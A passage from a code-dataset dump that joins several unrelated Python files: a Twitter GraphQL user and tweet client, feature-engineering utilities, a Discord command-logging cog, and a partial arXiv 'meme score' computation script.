self._routes = []\n        self.logging = logging.getLogger(\"TwitterUser\")\n        # I'm not sure if we are going to use a custom bearer in the future...\n        self.bearer = \"\"\n\n    getUserFeatures = {\n        \"responsive_web_twitter_blue_verified_badge_is_enabled\": True,\n        \"verified_phone_label_enabled\": True,\n        \"responsive_web_graphql_timeline_navigation_enabled\": True,\n        \"responsive_web_graphql_skip_user_profile_image_extensions_enabled\": False,\n        \"responsive_web_graphql_exclude_directive_enabled\": False,\n        \"blue_business_profile_image_shape_enabled\": True,\n        \"highlights_tweets_tab_ui_enabled\": True,\n        \"creator_subscriptions_tweet_preview_api_enabled\": True,\n    }\n\n    @property\n    async def routes(self):\n        if not self._routes:\n            self._routes = await self.gravity.retrieve_routes()\n        return self._routes\n\n    async def get_user(self, username: typing.Union[str, User]):\n        \"\"\"\n        Retrieves a User by its username/screenname.\n        :param username: The user's username. (e.g. Twitter)\n        :return: A User object containing the user's information.\n        \"\"\"\n        routes = await self.routes\n\n        if isinstance(username, User):\n            username = username.username\n        if username is None:\n            raise Exception(\"Malformed User data? Expected username to exist.\")\n\n        variables = {\n            \"screen_name\": username,\n            \"withSafetyModeUserFields\": False,\n            \"withSuperFollowsUserFields\": True,\n        }\n        route = routes.get(\"UserByScreenName\")\n        if not route:\n            print(\"Routes list:\")\n            print(routes)\n            raise Exception(\"Missing routes?\")\n        url = route[0]\n\n        # Twitter raises an error if we have a missing feature not present in the list.\n        # We could just look at the defaults but at the same time,\n        # it would be better to not follow blindly.\n        set_features = list(self.getUserFeatures.keys())\n        for feature in route[1][\"featureSwitches\"]:\n            if feature not in set_features:\n                self.logging.warning(\n                    f\"!! 
{feature} found in featureSwitch but missing in setFeatures.\"\n )\n a = await self.session.get(\n url,\n params={\n \"variables\": json.dumps(variables).replace(\" \", \"\"),\n \"features\": json.dumps(self.getUserFeatures).replace(\" \", \"\"),\n },\n )\n if a.status_code != 200:\n self.logging.debug(a.content)\n raise RedGalaxyException(f\"Expected 200. Got {a.status_code}\")\n # print(a)\n data: dict = a.json()\n true_user = data[\"data\"][\"user\"][\"result\"][\"legacy\"]\n true_user[\"id\"] = data[\"data\"][\"user\"][\"result\"][\"rest_id\"]\n return UtilBox.make_user(true_user)\n\n getUserIdFeatures = {\n \"responsive_web_twitter_blue_verified_badge_is_enabled\": True,\n \"responsive_web_graphql_exclude_directive_enabled\": True,\n \"verified_phone_label_enabled\": False,\n \"responsive_web_graphql_skip_user_profile_image_extensions_enabled\": False,\n \"responsive_web_graphql_timeline_navigation_enabled\": True,\n }\n\n async def get_user_by_id(\n self, *users: typing.Union[int, User]\n ) -> typing.Optional[User]:\n user_id_str = []\n for user_id in users:\n uid = None\n if isinstance(user_id, User):\n if user_id.id is None:\n raise Exception(\"Malformed User data? Expected username to exist.\")\n elif isinstance(user_id, int):\n uid = user_id\n elif isinstance(user_id, str):\n uid = int(user_id) # Test for an integer.\n else:\n raise Exception(f\"{user_id} is not a int or User object.\")\n\n user_id_str.append(str(uid))\n routes = await self.routes\n\n variables = {\n \"userIds\": user_id_str,\n \"withSafetyModeUserFields\": False,\n }\n\n route = routes.get(\"UsersByRestIds\")\n if not route:\n print(\"Routes list:\")\n print(routes)\n raise Exception(\"Missing routes?\")\n url = route[0]\n\n # Twitter raises an error if we have a missing feature not present in the list.\n # We could just look at the defaults but at the same time,\n # it would be better to not follow blindly.\n features = self.getUserIdFeatures\n set_features = list(features.keys())\n for feature in route[1][\"featureSwitches\"]:\n if feature not in set_features:\n self.logging.warning(\n f\"{feature} found in featureSwitch but missing in setFeatures.\"\n )\n await self.session.guest_token()\n replaced = url.replace(\"https://api.twitter.com/\", \"https://twitter.com/i/api/\")\n\n a = await self.session.get(\n replaced,\n params={\n \"variables\": json.dumps(variables).replace(\" \", \"\"),\n \"features\": json.dumps(features).replace(\" \", \"\"),\n },\n guest_token=True,\n )\n\n data: dict = a.json()\n inner_data: dict = data.get(\"data\", {})\n if inner_data:\n if len(user_id_str) == 1:\n inner_data[\"users\"][0][\"result\"][\"legacy\"][\"id\"] = user_id_str[0]\n return UtilBox.make_user(inner_data[\"users\"][0][\"result\"][\"legacy\"])\n else:\n users = []\n for idx, user in enumerate(inner_data[\"users\"]):\n if user:\n user[\"result\"][\"legacy\"][\"id\"] = user_id_str[idx]\n user = UtilBox.make_user(user[\"result\"][\"legacy\"])\n users.append(user)\n else:\n users.append(None)\n return users\n\n return None\n\n getTweetFeatures = {\n \"responsive_web_twitter_blue_verified_badge_is_enabled\": True,\n \"responsive_web_graphql_exclude_directive_enabled\": False,\n \"verified_phone_label_enabled\": False,\n \"responsive_web_graphql_timeline_navigation_enabled\": True,\n \"responsive_web_graphql_skip_user_profile_image_extensions_enabled\": False,\n \"longform_notetweets_consumption_enabled\": True,\n \"tweetypie_unmention_optimization_enabled\": True,\n \"vibe_api_enabled\": True,\n 
\"responsive_web_edit_tweet_api_enabled\": True,\n \"graphql_is_translatable_rweb_tweet_is_translatable_enabled\": True,\n \"view_counts_everywhere_api_enabled\": True,\n \"freedom_of_speech_not_reach_appeal_label_enabled\": False,\n \"standardized_nudges_misinfo\": True,\n \"tweet_with_visibility_results_prefer_gql_limited_actions_policy_enabled\": False,\n \"interactive_text_enabled\": True,\n \"responsive_web_text_conversations_enabled\": False,\n \"responsive_web_enhance_cards_enabled\": False,\n }\n\n async def get_tweet(self, tweet_id: int) -> typing.Optional[Tweet]:\n \"\"\"\n Get a tweet by its snowflake/tweet_id\n :param tweet_id: The tweet ID as an integer. E.G (1564598913784549376).\n :return: a Tweet Object. May return None if the tweet has been deleted or doesn't exist.\n \"\"\"\n routes = await self.routes\n\n variables = {\n \"focalTweetId\": str(tweet_id),\n \"with_rux_injections\": False,\n \"includePromotedContent\": True,\n \"withCommunity\": True,\n \"withQuickPromoteEligibilityTweetFields\": True,\n \"withBirdwatchNotes\": True,\n \"withSuperFollowsUserFields\": True,\n \"withDownvotePerspective\": False,\n \"withReactionsMetadata\": False,\n \"withReactionsPerspective\": False,\n \"withSuperFollowsTweetFields\": True,\n \"withVoice\": True,\n \"withV2Timeline\": True,\n }\n\n route = routes.get(\"TweetDetail\")\n if not route:\n print(\"Routes list:\")\n print(routes)\n raise Exception(\"Missing routes?\")\n url = route[0]\n\n # Twitter raises an error if we have a missing feature not present in the list.\n # We could just look at the defaults but at the same time,\n # it would be better to not follow blindly.\n features = self.getTweetFeatures\n set_features = list(features.keys())\n for feature in route[1][\"featureSwitches\"]:\n if feature not in set_features:\n self.logging.warning(\n f\"{feature} found in featureSwitch but missing in setFeatures.\"\n )\n await self.session.ensure_token()\n replaced = url.replace(\"https://api.twitter.com/\", \"https://twitter.com/i/api/\")\n a = await self.session.get(\n replaced,\n params={\n \"variables\": json.dumps(variables).replace(\" \", \"\"),\n \"features\": json.dumps(features).replace(\" \", \"\"),\n },\n guest_token=True,\n )\n data: dict = a.json()\n inner_data: dict = data.get(\"data\", {})\n for instruction in inner_data[\"threaded_conversation_with_injections_v2\"].get(\n \"instructions\"\n ):\n type_instruct = instruction[\"type\"]\n if type_instruct == \"TimelineAddEntries\":\n for entry in instruction[\"entries\"]:\n if entry[\"entryId\"].startswith(\"tweet-\"):\n base_tweet = entry[\"content\"][\"itemContent\"][\"tweet_results\"][\n \"result\"\n ]\n return UtilBox.common_tweet(base_tweet, None)\n","repo_name":"Ristellise/RedGalaxy","sub_path":"RedGalaxy/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":10291,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"6362006904","text":"\"\"\"\nCreated on 2021.4.9 10:32\n\"\"\"\nimport gc\nimport numpy as np\nimport random\nfrom sklearn.preprocessing import OneHotEncoder\n# from feature_engineering.global_params import feature_eng_bins_dict,feature_eng_combine_dict,feature_normalization_dict\nfrom feature_engineering.utils import replace_abnormal\nfrom feature_engineering.utils import ff,categories_to_int,calculate_chi2\nfrom collections import Counter\n\n\n#\ndef sqrt(col):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n try:\n # sqrt_col = 
np.sqrt(np.array(col))\n sqrt_col = [np.sqrt(x) if x>=0 else -np.sqrt(np.abs(x)) for x in col]\n sqrt_col = np.array(sqrt_col).reshape(len(sqrt_col),1)\n return sqrt_col\n except:\n raise ValueError('Value type error,check feature type')\n\ndef inverse_old(col):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n try:\n col = np.array(col)\n\n replace_col = np.array([float(np.where(x == 0., random.choice([1e-5,-1e-5]), x)) for x in col])\n new_col = replace_abnormal(1/replace_col)\n return new_col.reshape(len(new_col),1)\n except:\n raise ValueError('Value type error,check feature type')\n\ndef inverse(col):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n try:\n col = np.array(col) \n # replace_num = np.mean(1 / np.array(list(filter(lambda x: x!=0 ,col ))) )\n new_col = np.array([1/x if x!=0 else 0 for x in col])\n\n return new_col.reshape(len(new_col),1)\n except:\n raise ValueError('Value type error,check feature type')\n\n\ndef log(col):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n try:\n log_col = [np.log(np.abs(x)) if x!=0 else 0 for x in col]\n log_col = np.array(log_col).reshape(len(log_col),1)\n \n return log_col\n except:\n raise ValueError('Value type error,check feature type')\n \n\n\"\"\"\ndef normalization(col,col_index):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n # Feature z-core standardization\n # try:\n col = np.array(col)\n if col_index in feature_normalization_dict:\n mean,sigma = feature_normalization_dict[col_index]\n else:\n mean = np.mean(col)\n sigma = np.std(col)\n feature_normalization_dict[col_index] = (mean,sigma)\n new_col = []\n for x in col:\n scaled_x = (x-mean)/sigma\n new_col.append(scaled_x)\n return np.array(new_col).reshape(len(new_col),1)\n # except:\n # raise ValueError('Value type error,check feature type')\n\n\n # try:\n # scaled_col = preprocessing.scale(np.array(col))\n # return scaled_col.reshape(len(scaled_col),1)\n # except:\n # raise ValueError('Value type error,check feature type')\n\n\ndef max_min_old(col,col_index):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n # feature min_max normalization, multiple columns need to be considered\n\n col = np.array(col)\n if col_index in feature_normalization_dict:\n max,min = feature_normalization_dict[col_index]\n # print(col_index)\n else:\n max = np.max(col)\n min = np.min(col)\n feature_normalization_dict[col_index] = (max,min)\n new_col = []\n for x in col:\n x_scaled = float((x - min) / (max - min))\n new_col.append(x_scaled)\n # print(x_scaled)\n return np.array(new_col)\n\"\"\"\ndef max_min(col,col_op):\n '''\n :type col: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n\n col = np.array(col).reshape(len(col),1)\n # print('max_min : -----', col)\n max = np.max(col)\n min = np.min(col)\n # feature_normalization_dict[str(col_op)] = (max,min)\n\n # new_col = np.apply_along_axis(lambda x :float((x - min) / (max - min)),axis=1,arr=col)\n new_col = [float((x - min) / (max - min)) if (max - min)!=0 else 0 for x in col ]\n\n return np.array(new_col).reshape(len(new_col))\n\n\n\ndef add(col1,col2):\n '''\n :type col1,col2: list or np.array\n :rtype: np.array,shape = (len(array),1)\n '''\n #\n try:\n col1 = np.array(col1)\n col2 = np.array(col2)\n return (col1 + col2).reshape(len(col1),1)\n except:\n raise ValueError('Value type error,check feature type')\n\ndef multiply(col1, col2):\n 
'''\n    :type col1,col2: list or np.array\n    :rtype: np.array,shape = (len(array),1)\n    '''\n    # element-wise product of the two feature columns\n    try:\n        col1 = np.array(col1)\n        col2 = np.array(col2)\n        return (col1 * col2).reshape(len(col1),1)\n    except:\n        raise ValueError('Value type error,check feature type')\n\ndef subtract(col1, col2):\n    '''\n    :type col1,col2: list or np.array\n    :rtype: np.array,shape = (len(array),2)\n    '''\n    # both difference directions are returned, one per column\n    try:\n        col1 = np.array(col1).reshape(len(col1),1)\n        col2 = np.array(col2).reshape(len(col2),1)\n        return np.concatenate((col1 - col2,col2 - col1),axis = 1)\n    except:\n        raise ValueError('Value type error,check feature type')\n\ndef divide_old(col1,col2):\n    '''\n    :type col1,col2: list or np.array\n    :rtype: np.array,shape = (len(array),2)\n    '''\n    try:\n        col1 = np.array(col1)\n        col2 = np.array(col2)\n        replace_col1 = np.array([float(np.where(x == 0., random.choice([1e-5,-1e-5]), x)) for x in col1])\n        replace_col2 = np.array([float(np.where(x == 0., random.choice([1e-5,-1e-5]), x)) for x in col2])\n        col_d1,col_d2 = replace_col1/replace_col2,replace_col2/replace_col1\n        col_d1 = replace_abnormal(col_d1)\n        col_d2 = replace_abnormal(col_d2)\n        return np.concatenate((col_d1,col_d2),axis = 1)\n    except:\n        raise ValueError('Value type error,check feature type')\n\n\ndef divide(col1,col2):\n    '''\n    :type col1,col2: list or np.array\n    :rtype: np.array,shape = (len(array),2)\n    '''\n    try:\n        col1 = np.array(col1)\n        col2 = np.array(col2)\n        col_d1 = np.array([col1[idx]/col2[idx] if col2[idx]!=0 else 0 for idx in range(len(col1))])\n        col_d2 = np.array([col2[idx]/col1[idx] if col1[idx]!=0 else 0 for idx in range(len(col1))]) \n        col_d1 = replace_abnormal(col_d1)\n        col_d2 = replace_abnormal(col_d2)\n        col_d1 = col_d1.reshape(len(col_d1),1)\n        col_d2 = col_d2.reshape(len(col_d2),1)\n        return np.concatenate((col_d1,col_d2),axis = 1)\n    except:\n        raise ValueError('Value type error,check feature type')\n\ndef onehot_encoder(ori_fe):\n    '''\n\n    '''\n    ori_fe = np.array(ori_fe).reshape(len(ori_fe),1)\n    encoder = OneHotEncoder()\n    enc = encoder.fit(ori_fe)\n    onehot_fe = enc.transform(ori_fe).toarray()\n    return onehot_fe\n\n# Binning operation (stub; body was never filled in)\ndef merge(ori_fe,bins,fe_name = None):\n    ''''''\n    ori_fe = np.array(ori_fe)\n\n\ndef binning(ori_fe,bins,fe_name = None,method = 'frequency'):\n    '''\n\n    '''\n    ori_fe = np.array(ori_fe)\n\n    # k = bins - 1\n    if method == 'frequency':\n\n        fre_list = [np.percentile(ori_fe, 100 / bins * i) for i in range(1,bins)]\n        fre_list = sorted(list(set(fre_list)))\n\n        new_fe = np.array([ff(x,fre_list) for x in ori_fe])\n        new_fe_encode = onehot_encoder(new_fe)\n        return new_fe.reshape(len(new_fe),1),fre_list,new_fe_encode\n    # Equidistant box division\n    elif method == 'distance':\n        umax = np.percentile(ori_fe, 99.99)\n        umin = np.percentile(ori_fe, 0.01)\n        step = (umax - umin) / bins\n        fre_list = [umin + i * step for i in range(bins)]\n\n        new_fe = np.array([ff(x,fre_list) for x in ori_fe])\n        new_fe_encode = onehot_encoder(new_fe)\n        return new_fe.reshape(len(new_fe), 1),fre_list,new_fe_encode\n\ndef reset_value(ori_fe,c, merged_values, k):\n    for merged_value in merged_values:\n        indexs = np.argwhere(ori_fe == merged_value).reshape(-1)\n        # Modify and search the low frequency value of the original A\n        new_value = k + c # This basically ensures that the original value will not be repeated\n        ori_fe[indexs] = new_value\n\n\ndef recur_merge_regression(bins, frequency_list, value_types, residual_f , ori_fe):\n    # Recursively merge the frequency probability variables, where the default variable frequencies have been sorted\n    # Version 
for regression problems\n k = len(ori_fe)\n if bins == 1:\n merged_values = value_types\n reset_value(ori_fe,len(value_types),merged_values, k)\n return\n target_frequency = residual_f / bins\n merged_f,merged_values,ptr = 0,[],0\n for i,f in enumerate(frequency_list):\n residual_f -= f\n ptr = i + 1\n if f < target_frequency:\n merged_f += f\n merged_values.append(value_types[i])\n if merged_f >= target_frequency:\n bins -= 1\n break\n else:\n bins -= 1\n break\n reset_value(ori_fe,len(value_types), merged_values, k)\n frequency_list,value_types = frequency_list[ptr:],value_types[ptr:]\n\n recur_merge_regression(bins,frequency_list,value_types,residual_f, ori_fe)\n\n\n\ndef recur_merge_classify(chi2_dict,bins,ori_fe):\n\n\n def merge_value_type(chi2_value_tuple, chi2_dict, c):\n chi2_1, chi2_2 = chi2_value_tuple\n if chi2_1 == chi2_2:\n index1 = list(chi2_dict.values()).index(chi2_1)\n index2 = index1 + 1\n else:\n index1 = list(chi2_dict.values()).index(chi2_1)\n index2 = list(chi2_dict.values()).index(chi2_2)\n value_type_of_chi2_1 = list(chi2_dict.keys())[index1]\n value_type_of_chi2_2 = list(chi2_dict.keys())[index2]\n new_chi2_value = chi2_1 + chi2_2\n k = len(ori_fe) + value_type_of_chi2_2 + value_type_of_chi2_1\n merged_values = [value_type_of_chi2_1, value_type_of_chi2_2]\n reset_value(ori_fe, c, merged_values, k)\n new_value_type = k + c\n chi2_dict[new_value_type] = new_chi2_value\n del chi2_dict[value_type_of_chi2_1]\n del chi2_dict[value_type_of_chi2_2]\n chi2_dict = dict(sorted(chi2_dict.items(), key=lambda x: x[1], reverse=True))\n return chi2_dict\n\n c = len(np.unique(ori_fe))\n while c > bins:\n chi2_value_list = np.array(list(chi2_dict.values()))\n chi2_value_tuple = (chi2_value_list[-1],chi2_value_list[-2])\n chi2_dict = merge_value_type(chi2_value_tuple,chi2_dict,c)\n c = len(list(chi2_dict.values()))\n\n\ndef binning_for_discrete(ori_fe, bins, mode, label,fe_name = None):\n\n\n ori_fe = categories_to_int(ori_fe)\n unique_value = list(set(list(ori_fe)))\n k = len(unique_value)\n if k <= bins:\n return np.array(ori_fe).reshape(-1,1)\n\n if mode == 'regression':\n n = len(ori_fe)\n # 1.First calculate the frequency of each classification variable\n frequency = dict(Counter(ori_fe))\n sorted_frequency = dict(sorted(frequency.items(),key = lambda x:x[1], reverse = True))\n for key in sorted_frequency.keys():\n sorted_frequency[key] /= n\n frequency_list = list(sorted_frequency.values())\n value_types = list(sorted_frequency.keys())\n recur_merge_regression(bins,frequency_list,value_types,residual_f=1.0,ori_fe = ori_fe)\n\n else:\n\n sorted_chi2_dict = calculate_chi2(ori_fe,label)\n recur_merge_classify(sorted_chi2_dict,bins,ori_fe)\n ori_fe = categories_to_int(ori_fe)\n return ori_fe.reshape(len(ori_fe))\n\ndef cal_woe_iv(X,y,bins):\n '''\n '''\n if len(X) != len(y):\n raise KeyError('Feature length not equal to target length')\n bins_x,bond_list,encode_x = binning(X,bins)\n del encode_x #\n gc.collect()\n bins_x = np.array([x[0] for x in bins_x])\n bins_unique = np.unique(bins_x)\n y_positive_sum,y_negtive_sum = sum(y),len(y) - sum(y)\n\n bins_positive_negtive_dic = {}\n for bin_unique in bins_unique:\n bins_positive_negtive_dic[bin_unique] = [0,0] #\n for bin_x,t in zip(bins_x,y):\n if not t:\n bins_positive_negtive_dic[bin_x][1] += 1\n else:\n bins_positive_negtive_dic[bin_x][0] += 1\n # woe = np.log((yi/yt)/(ni/nt))\n woe,iv = [],[]\n for bin_x in bins_x:\n yi,ni = bins_positive_negtive_dic[bin_x]\n woe_i = np.log((yi/y_positive_sum)/(ni/y_negtive_sum))\n iv_i = 
((yi/y_positive_sum) - (ni/y_negtive_sum)) * woe_i\n        woe.append(woe_i)\n        iv.append(iv_i)\n    return np.array(woe).reshape(len(woe),1), iv\n\n\n\n\ndef col_names_maping(col_names,ori_cols,combine_features_name_list):\n    '''\n    '''\n    hash_map = {}\n    for i,col_name in enumerate(col_names):\n        if col_name not in hash_map:\n            hash_map[col_name] = i\n        else:\n            raise ValueError('Duplicate col_name in original features')\n    selected_cols = []\n    for feature_name in combine_features_name_list:\n        selected_cols.append(hash_map[feature_name])\n    extracted_features = ori_cols[:,selected_cols]\n    return extracted_features\n\n\ndef combine_onehot(ori_fes,fe_names):\n\n    col_unique_list = []\n    col_unique_dict = {}\n    for i,name in enumerate(fe_names):\n        unique_value = np.unique(ori_fes[:,i])\n        unique_dict = {value:str(idx) for idx,value in enumerate(unique_value)}\n        col_unique_dict[name] = unique_dict\n        col_unique_list.append(list(unique_dict.values()))\n    from itertools import product\n    composite_idx = list(product(*col_unique_list))\n    composite_str = [''.join(list(tp)) for tp in composite_idx] # Unique combination['00', '01', '10', '11']\n    zero_array = np.zeros(shape=(len(ori_fes) , len(composite_str) + 1))\n    new_col_composite_str = [[str(int(imp)) for imp in row] for row in ori_fes]\n    new_col_composite_str = [''.join(lt) for lt in new_col_composite_str]\n    \n    for row,cp_str in enumerate(new_col_composite_str):\n        if cp_str in composite_str:\n            col = composite_str.index(cp_str)\n            zero_array[row,col] = 1\n        else:\n            zero_array[row,-1] = 1\n    # print(fe_names , zero_array.shape)\n    return zero_array\n    \n\ndef check_is_continuous(ori_fes,fe_names,continuous_columns,continuous_bins):\n    for idx,name in enumerate(fe_names):\n        if name in continuous_columns:\n            bins = continuous_bins[name]\n            if len(np.unique(ori_fes[:,idx])) < bins:\n                raise ValueError(f'{name} unique value is {len(np.unique(ori_fes[:,idx]))} , but bins {bins}')\n            fes_bins,_,_ = binning(ori_fes[:,idx],bins,fe_name = name,method = 'frequency')\n            # print(fes_bins)\n            # print(fes_bins.reshape(len(fes_bins),1))\n            ori_fes[:,idx] = fes_bins.reshape(len(fes_bins))\n    return ori_fes\n\ndef combine_noonehot(ori_fes,fe_names):\n    # same combination logic as combine_onehot, but returns a single ordinal column\n    col_unique_list = []\n    col_unique_dict = {}\n    for i,name in enumerate(fe_names):\n        unique_value = np.unique(ori_fes[:,i])\n        unique_dict = {value:str(idx) for idx,value in enumerate(unique_value)}\n        col_unique_dict[name] = unique_dict\n        col_unique_list.append(list(unique_dict.values()))\n    from itertools import product\n    composite_idx = list(product(*col_unique_list))\n    composite_str = [''.join(list(tp)) for tp in composite_idx] # unique combinations, e.g. ['00', '01', '10', '11']\n    new_col_composite_str = [[str(int(imp)) for imp in row] for row in ori_fes]\n    new_col_composite_str = [''.join(lt) for lt in new_col_composite_str]\n    combine_col = np.array([composite_str.index(cp_str) for cp_str in new_col_composite_str])\n    \n    return combine_col.reshape(-1,1)\n\n\n","repo_name":"Grason-Lu/Catch","sub_path":"feature_engineering/feature_generate.py","file_name":"feature_generate.py","file_ext":"py","file_size_in_byte":15559,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"}{"seq_id":"42346871274","text":"from core import Invocation, is_user_opted_out_of_data_processing\nimport datetime as dt\nfrom somsiad import Somsiad, SomsiadMixin\n\nimport psycopg2\nfrom discord.ext import commands\n\nimport data\nfrom utilities import text_snippet, utc_to_naive_local\n\n\nclass Commands(commands.Cog, SomsiadMixin):\n    
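\"\"\"Records every command invocation and its outcome, skipping users who opted out of data processing.\"\"\"\n\n    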
@commands.Cog.listener()\n async def on_command(self, ctx: commands.Context):\n with data.session(commit=True) as session:\n if not ctx.command or is_user_opted_out_of_data_processing(session, ctx.author.id):\n return\n invocation = Invocation(\n message_id=ctx.message.id,\n server_id=ctx.guild.id if ctx.guild is not None else None,\n channel_id=ctx.channel.id,\n user_id=ctx.author.id,\n prefix=ctx.prefix,\n full_command=ctx.command.qualified_name,\n root_command=str(ctx.command.root_parent or ctx.command.qualified_name),\n created_at=utc_to_naive_local(ctx.message.created_at),\n )\n session.add(invocation)\n\n @commands.Cog.listener()\n async def on_command_completion(self, ctx: commands.Context):\n with data.session(commit=True) as session:\n if is_user_opted_out_of_data_processing(session, ctx.author.id):\n return\n invocation = session.query(Invocation).get(ctx.message.id)\n invocation.exited_at = dt.datetime.now()\n\n @commands.Cog.listener()\n async def on_command_error(self, ctx: commands.Context, error: commands.CommandError):\n with data.session(commit=True) as session:\n if is_user_opted_out_of_data_processing(session, ctx.author.id):\n return\n invocation = session.query(Invocation).get(ctx.message.id)\n if invocation is not None:\n invocation.exited_at = dt.datetime.now()\n invocation.error = text_snippet(\n str(error).replace('Command raised an exception: ', ''), Invocation.MAX_ERROR_LENGTH\n )\n\n\nasync def setup(bot: Somsiad):\n await bot.add_cog(Commands(bot))\n","repo_name":"Twixes/somsiad","sub_path":"plugins/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} +{"seq_id":"23977100617","text":"import os\nimport json\nimport pickle\nimport argparse\nimport string\nfrom tqdm import tqdm\nfrom datetime import date\nimport numpy as np\nfrom time import time\n\nfrom combine_meme_files import get_combined_metadata\n\nSCRATCH_PATH = '/scratch/datasets/aw588/'\nUNARXIVE_PATH = SCRATCH_PATH + \"unarXive\"\nCACHE_PATH = '/scratch/datasets/mog29/unarXive'\nVALID_DISCIPLINES = [\"cs.AI\", \"cs.CL\", \"cs.CV\", \"cs.LG\", \"stat.ML\"]\nINTRO_SUBSTRING = 'introduction'\nRW_SUBSTRING = 'related'\nMETHOD_SUBSTRINGS = ['method', 'model', 'approach']\nIDF_THRESHOLD = 1.6\n\n\ndef compute_overall_frequencies(year_to_frequencies, paper_to_metadata, disciplines):\n max_year = max(list(year_to_frequencies.keys()))\n\n for paper, metadata in tqdm(paper_to_metadata.items()):\n categories = metadata['categories']\n found_match = any([cat in disciplines for cat in categories])\n if not found_match:\n continue\n\n year = int(metadata['release_date'][-1])\n for curr_year in range(year, max_year + 1): \n year_to_frequencies[curr_year]['num_papers'] += 1\n\ndef get_combined_n_grams(years):\n new_years = [str(year)[2:] for year in years]\n\n # Iterate over all years\n all_paper_ids = set()\n meme_to_articles = {}\n for year in tqdm(new_years):\n year_meme_path = os.path.join(CACHE_PATH, f'n_gram_to_papers_{year}.pkl')\n with open(year_meme_path, 'rb') as f:\n year_memes = pickle.load(f)\n\n for meme, containing_docs in year_memes.items():\n if meme not in meme_to_articles:\n meme_to_articles[meme] = set()\n for containing_doc in containing_docs:\n meme_to_articles[meme].add(containing_doc)\n all_paper_ids.add(containing_doc)\n\n return meme_to_articles\n\n\ndef is_meme_in_paper(paper, meme, meme_to_articles):\n if meme not in meme_to_articles:\n return False\n return paper in 
meme_to_articles[meme]\n\ndef is_meme_in_citations(citations, meme, meme_to_articles):\n truth_vals = []\n for paper in citations:\n truth_vals.append(is_meme_in_paper(paper, meme, meme_to_articles))\n return any(truth_vals)\n\ndef compute_n_gram_meme_score_terms(year, meme_to_articles, common_memes, meme_to_score_components,\n paper_to_metadata, disciplines):\n for paper, metadata in tqdm(paper_to_metadata.items()):\n # Skip paper if out of discipline\n categories = metadata['categories']\n found_match = any([cat in disciplines for cat in categories])\n if not found_match:\n continue\n\n # Skip paper if published after year\n paper_year = int(metadata[\"release_date\"][-1])\n if paper_year > year:\n continue\n citations = metadata['cited_papers']\n\n # Iterate over each meme\n for meme in common_memes:\n meme_in_paper = is_meme_in_paper(paper, meme, meme_to_articles)\n meme_in_citations = is_meme_in_citations(citations, meme, meme_to_articles) \n\n if meme_in_paper:\n meme_to_score_components[meme]['frequency'] += 1\n if meme_in_citations:\n meme_to_score_components[meme]['in_paper_in_citations'] += 1\n meme_to_score_components[meme]['in_citations'] += 1\n else:\n meme_to_score_components[meme]['in_paper_not_in_citations'] += 1\n meme_to_score_components[meme]['not_in_citations'] += 1\n else:\n if meme_in_citations:\n meme_to_score_components[meme]['in_citations'] += 1\n else:\n meme_to_score_components[meme]['not_in_citations'] += 1 \n \ndef save_year_discipline_meme_scores(year_to_frequencies, meme_to_score_components, year, discipline_suffix):\n meme_to_scores = {}\n for meme, score_components in meme_to_score_components.items():\n # Compute the frequency score\n total_frequency = year_to_frequencies[year]['num_papers']\n meme_frequency = score_components['frequency']\n frequency_score = meme_frequency / (total_frequency + 1e-8)\n\n # Compute sticking scores\n in_paper_in_citations = score_components['in_paper_in_citations']\n in_citations = score_components['in_citations']\n sticking_score = in_paper_in_citations / (3 + in_citations)\n \n # Compute sparking scores\n in_paper_not_in_citations = score_components['in_paper_not_in_citations']\n not_in_citations = score_components['not_in_citations']\n sparking_score = (3+in_paper_not_in_citations) / (3 + not_in_citations)\n\n # Compute meme scores\n meme_score = frequency_score * sticking_score / sparking_score\n meme_to_scores[meme] = {\"meme_score\" : meme_score}\n\n meme_score_path = os.path.join(CACHE_PATH, f'year_{year}_meme_scores_{discipline_suffix}.pkl')\n with open(meme_score_path, 'wb') as f:\n pickle.dump(meme_to_scores, f) \n\nif __name__ == \"__main__\":\n years = [i for i in range(1991, 2023)]\n\n paper_to_metadata = get_combined_metadata()\n meme_to_articles = get_combined_n_grams(years)\n\n # Compute the total number of publications per year\n all_disciplines = [\n VALID_DISCIPLINES,\n ['astro-ph.CO', 'astro-ph.EP', 'astro-ph.GA', 'astro-ph.HE', 'astro-ph.IM', 'astro-ph.SR'],\n ['cond-mat.dis-nn', 'cond-mat.mes-hall', 'cond-mat.mtrl-sci', 'cond-mat.other',\n 'cond-mat.quant-gas', 'cond-mat.soft', 'cond-mat.stat-mech', 'cond-mat.str-el',\n 'cond-mat.supr-con'],\n ['hep-ex', 'hep-lat', 'hep-ph', 'hep-th'],\n ['nlin.AO', 'nlin.CD', 'nlin.CG', 'nlin.PS', 'nlin.SI'],\n ['nucl-ex', 'nucl-th']]\n discipline_suffixes = [\n 'ai',\n 'astrophysics',\n 'condensed_matter',\n 'high_energy',\n 'nonlinear',\n 'nuclear']\n\n # Iterate over each year/discipline pair\n for i in range(len(all_disciplines)):\n discipline = all_disciplines[i]\n 
